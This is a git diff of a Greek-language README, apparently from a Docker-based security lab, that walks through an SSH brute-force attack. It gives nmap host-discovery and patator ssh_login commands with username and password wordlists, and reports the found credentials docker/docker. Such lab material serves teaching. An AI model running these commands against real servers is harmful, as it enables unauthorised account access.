Browse Source

Update '2. SSH Brute Force/README.md'

master
AndreasNefeli 3 years ago
parent
commit
803ad8b3da
  1. 12
      2. SSH Brute Force/README.md

12
2. SSH Brute Force/README.md

@ -43,15 +43,19 @@ ________________________________________________________________________________
**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')**
* Με την ακόλουθη εντολή εκτελείτεαι η επίθεση, όπου:
* Με την ακόλουθη εντολή εκτελείται η επίθεση, όπου:
1. password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό
2.
2. usernames.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό όνομα χρήστη
3. host: μεταβλητή που περιέχει την ip του επιτιθέμένου worker
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker**
**patator ssh_login host=$worker user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt**
* Εάν δε θέλουμε να εμφανιστούν, όλες οι ανεπιτυχείς προσπάθειες της επίθεσης, αλλά μόνο ο σωστός κωδικός, πρέπει να συμπληρώσουμε **-x ignore:mesg='Authentication failed.'** και η προηγούμενη εντολή θα εκτελεστεί έτσι:
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'**
**patator ssh_login host=$worker user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt -x ignore:mesg='Authentication failed.'**
Επειδή κάνουμε έλεγχο δύο παραγόντων (username και password), όλοι οι κωδικοί θα δοκιμαστούν για κάθε όνομα χρήστη. Το σωστό αποτέλεσμα, όπως είναι αναμενόμενο, είναι **user: docker και password: docker**
_____________________________________________________________________________________________

Loading…
Cancel
Save